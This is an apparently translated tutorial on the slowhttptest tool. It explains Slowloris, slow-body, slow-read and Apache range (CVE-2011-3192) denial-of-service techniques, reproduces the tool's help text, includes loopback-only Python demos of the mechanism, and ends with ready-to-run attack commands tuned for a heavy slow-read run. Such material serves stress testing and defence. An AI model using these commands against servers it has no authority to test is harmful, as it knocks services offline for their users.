slowhttptest
- slowhttptest source code
- SlowHTTPTest is a highly configurable stress-testing tool
- In essence it builds and sends specially crafted HTTP requests that try to overload the server or make it deny service
- Runs on the major Linux distributions and on Windows
The tool is packaged by the mainstream package managers and can be installed directly with apt:
```
apt install -y slowhttptest
```
0x1 Principle
slowhttptest relies on a basic property of HTTP servers:
- The server only starts processing a request after it has received it completely
- As long as a request is still being transmitted, even at a very low rate, the server keeps resources (a connection slot, a worker thread or process) allocated to it
- When a large number of such slow HTTP requests hold connections to the server at the same time, legitimate clients can no longer be served: denial of service
- A DoS built on this principle does not drive the server's CPU up; it simply keeps the server waiting
Attack details (these apply to the slow read mode):
- The attacker's receive window must be smaller than the server's send buffer, the smaller the better
- The resource the attacker requests should be larger than the server's socket send buffer (usually 64-128 KB); otherwise the server hands the whole response to the kernel at once and moves on
- If no resource of that size is available, the same request can be repeated on each connection with
```
slowhttptest -k
```
which multiplies the response size and fills the server's send buffer
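The principle above, as an added example that is not code from slowhttptest or from the original page: it builds the request shapes the slow headers and slow body modes rely on, implements the completeness check a server performs before it will process a request, and runs a one-connection server on loopback to show that server stuck waiting. The loopback host, the request fields and the timeouts are assumptions chosen for the demo; nothing leaves 127.0.0.1.

```python
"""Added example (not code from slowhttptest): the request shapes that slow
headers (-H) and slow body (-B) rely on, the completeness check a server runs
before it processes a request, and a local demo of a server stuck waiting.
Host names and the loopback listener are assumptions; nothing leaves 127.0.0.1."""
import random
import re
import socket
import string
import threading

HOST = "127.0.0.1"  # assumed: demo server and client both live on loopback


def slow_headers_request(host: str, path: str = "/") -> bytes:
    """Slowloris opener: valid request line and headers, but no terminating
    blank line, so the server cannot consider the request complete."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            "User-Agent: Mozilla/5.0\r\n").encode()


def followup_header(max_len: int = 32) -> bytes:
    """One slow-headers tick (what -x controls): a random 'X-xx: xx' header
    that keeps bytes flowing without ever closing the header block."""
    n = random.randint(1, max_len)
    name = "".join(random.choices(string.ascii_lowercase, k=n))
    value = "".join(random.choices(string.ascii_lowercase, k=n))
    return f"X-{name}: {value}\r\n".encode()


def slow_body_request(host: str, path: str = "/",
                      content_length: int = 4096) -> bytes:
    """R-U-Dead-Yet opener: headers are complete, but Content-Length (-s)
    promises a body that will only trickle in."""
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {content_length}\r\n\r\n").encode()


def followup_body(max_len: int = 32) -> bytes:
    """One slow-body tick: a few bytes of form data ('&xx=xx')."""
    n = random.randint(1, max_len)
    key = "".join(random.choices(string.ascii_lowercase, k=n))
    return f"&{key}={key}".encode()


def request_state(buf: bytes) -> str:
    """The server-side view of its receive buffer. A server only starts
    processing at 'complete'; until then the connection (and the worker or
    slot behind it) stays held."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return "headers-incomplete"
    head, body = buf[:end], buf[end + 4:]
    m = re.search(rb"(?im)^content-length:\s*(\d+)\s*$", head)
    need = int(m.group(1)) if m else 0
    return "complete" if len(body) >= need else "body-incomplete"


def simulate(client_bytes: bytes, server_patience: float) -> str:
    """Run a one-connection server on loopback, have a client send
    `client_bytes` and then go quiet, and return what the server concluded
    when it either got a complete request or lost patience."""
    srv = socket.socket()
    srv.bind((HOST, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    outcome = {}

    def server():
        conn, _ = srv.accept()
        conn.settimeout(server_patience)   # a real server's request timeout
        buf = b""
        try:
            while request_state(buf) != "complete":
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass                            # client went slow: slot was held the whole time
        outcome["state"] = request_state(buf)
        conn.close()
        srv.close()

    t = threading.Thread(target=server)
    t.start()
    cli = socket.create_connection((HOST, port))
    cli.sendall(client_bytes)
    t.join()
    cli.close()
    return outcome["state"]


if __name__ == "__main__":
    opener = slow_headers_request(HOST) + followup_header()
    print("slow headers, server waited 1s:", simulate(opener, 1.0))
    print("complete request:", simulate(slow_headers_request(HOST) + b"\r\n", 1.0))
```

With the server's patience set to one second the slow-headers run reports `headers-incomplete` after that second has been burned; a real slowhttptest run sends a followup every -i seconds from -c connections, so every one of those seconds is multiplied by the number of held slots.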
0x2 Parameters
Start with -h to see the help text:
```text
# slowhttptest -h
slowhttptest, a tool to test for slow HTTP DoS vulnerabilities - version 1.6
Usage: slowhttptest [options ...]
Test modes:
  -H               slow headers a.k.a. Slowloris (default)
  -B               slow body a.k.a R-U-Dead-Yet
  -R               range attack a.k.a Apache killer
  -X               slow read a.k.a Slow Read
Reporting options:
  -g               generate statistics with socket state changes (off)
  -o file_prefix   save statistics output in file.html and file.csv (-g required)
  -v level         verbosity level 0-4: Fatal, Info, Error, Warning, Debug
General options:
  -c connections   target number of connections (50)
  -i seconds       interval between followup data in seconds (10)
  -l seconds       target test length in seconds (240)
  -r rate          connections per seconds (50)
  -s bytes         value of Content-Length header if needed (4096)
  -t verb          verb to use in request, default to GET for slow headers and response and to POST for slow body
  -u URL           absolute URL of target (http://localhost/)
  -x bytes         max length of each randomized name/value pair of followup data per tick, e.g. -x 2 generates X-xx: xx for header or &xx=xx for body, where x is random character (32)
  -f content-type  value of Content-type header (application/x-www-form-urlencoded)
  -m accept        value of Accept header (text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)
Probe/Proxy options:
  -d host:port     all traffic directed through HTTP proxy at host:port (off)
  -e host:port     probe traffic directed through HTTP proxy at host:port (off)
  -p seconds       timeout to wait for HTTP response on probe connection, after which server is considered inaccessible (5)
Range attack specific options:
  -a start         left boundary of range in range header (5)
  -b bytes         limit for range header right boundary values (2000)
Slow read specific options:
  -k num           number of times to repeat same request in the connection. Use to multiply response size if server supports persistent connections (1)
  -n seconds       interval between read operations from recv buffer in seconds (1)
  -w bytes         start of the range advertised window size would be picked from (1)
  -y bytes         end of the range advertised window size would be picked from (512)
  -z bytes         bytes to slow read from receive buffer with single read() call (5)
```
The key parameters:
- -H: attack through the headers. A complete HTTP request ends with \r\n\r\n, but Slowloris never sends the terminating blank line, only further header lines ending in \r\n, so the server keeps waiting for the request to finish
- -B: attack through the body. Uses the Content-Length header: it declares a very large Content-Length and then sends the body extremely slowly, so the server keeps the connection open waiting for the remaining bytes
- -X: attack through reading. Sends a request for a large file and then reads the response very slowly, advertising a very small TCP window so that the server can only trickle the data out; the file stays buffered on the server for a long time and its resources are exhausted
- -R: attack through CVE-2011-3192 (the Apache killer range attack), mainly against the following Apache versions: 1.3.x, 2.0.x up to 2.0.64, 2.2.x up to 2.2.19
- -u: the target URL
- -c: number of concurrent attack connections
- -g: record statistics on socket state changes
- -o: save those statistics to a file and generate an HTML report with charts; requires -g
- -r: how many connections to open per second
- -w 512 -y 1024: the advertised window size of each connection is picked at random between 512 and 1024 bytes and is set when the connection is opened (SYN)
- -n 5 -z 32: read 32 bytes of data every 5 seconds
- -k: repeat factor, how many times the same request is replayed on each connection; with persistent connections this multiplies the size of the response the server has to deliver
- -p: probe timeout in seconds; if the probe connection gets no data from the server within -p seconds, the server is judged DoSed
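The slow read mode described under -X, -w/-y and -n/-z, as an added example that is not code from slowhttptest or from the original page: on a loopback socket pair it measures how much of a large response the server can hand to the kernel before a client that advertises a tiny window and reads a few bytes at a time stalls it. The response size, chunk size, timeouts and loopback host are assumptions chosen for the demo.

```python
"""Added example (not code from slowhttptest): measure on a loopback socket
pair how much of a response a server can queue before a slow-reading client
with a tiny advertised window stalls it. This is the mechanism behind -X with
-w/-y (window) and -n/-z (read cadence). Response size, chunking, timeouts and
the loopback host are assumptions chosen for the demo."""
import socket
import threading
import time

HOST = "127.0.0.1"                  # assumed: everything stays on loopback
RESPONSE_SIZE = 64 * 1024 * 1024    # the "large file": far bigger than any socket buffer
CHUNK = b"A" * (64 * 1024)          # what the server writes per send() call


def slow_read_probe(window: int, read_size: int, reads: int,
                    read_interval: float = 0.05, patience: float = 1.0) -> dict:
    """Server side: push RESPONSE_SIZE bytes as fast as send() allows and give
    up once a send() blocks for `patience` seconds (a real server's write
    timeout). Client side: set SO_RCVBUF to `window` before connecting, so the
    small window is advertised from the handshake on (what -w/-y do), then take
    `read_size` bytes every `read_interval` seconds (what -z/-n do).
    Returns how far the server got and how little the client took."""
    srv = socket.socket()
    srv.bind((HOST, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    stats = {"sent": 0, "received": 0, "blocked": False, "window_effective": 0}

    def server():
        conn, _ = srv.accept()
        conn.settimeout(patience)
        try:
            while stats["sent"] < RESPONSE_SIZE:
                stats["sent"] += conn.send(CHUNK)   # returns as long as buffers have room
        except socket.timeout:
            stats["blocked"] = True                 # client never drained: response stuck in the server
        conn.close()
        srv.close()

    t = threading.Thread(target=server)
    t.start()
    cli = socket.socket()
    cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, window)   # must precede connect()
    cli.connect((HOST, port))
    # the kernel may round the requested buffer up; report what it actually used
    stats["window_effective"] = cli.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
    for _ in range(reads):
        time.sleep(read_interval)
        stats["received"] += len(cli.recv(read_size))
    t.join()                                        # wait for the server to give up
    cli.close()
    return stats


if __name__ == "__main__":
    s = slow_read_probe(window=512, read_size=32, reads=8)
    print(f"server queued {s['sent']} of {RESPONSE_SIZE} bytes, client took "
          f"{s['received']} (effective window {s['window_effective']}), "
          f"server blocked: {s['blocked']}")
```

The `sent` figure is roughly the combined size of the server's send buffer and the client's receive buffer: a response smaller than that is handed over in one go and the server moves on, which is exactly why the requested resource has to exceed the server's send buffer (or be multiplied with -k) for slow read to bite.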
0x3 Attack demo
The general form of a slowhttptest command is:
```
slowhttptest -H -u http://10.25.153.231/index.html
```
A more aggressive run can be put together as needed, for example this slow read test:
```
slowhttptest -c 1000 -X \
  -g -o slow_read_stats -r 200 \
  -w 512 -y 1024 \
  -n 5 -z 32 -k 3 \
  -u https://myseceureserver/resources/index.html -p 3
```
- This opens 200 attack connections per second up to a maximum of 1000, advertises a random window size between 512 and 1024 bytes on each connection, reads 32 bytes from the server every 5 seconds, replays each request three times on its connection, and judges the DoS successful when the probe connection gets no response from the server for 3 seconds
- If -g -o is used to generate charts, an HTML file is produced that looks like this: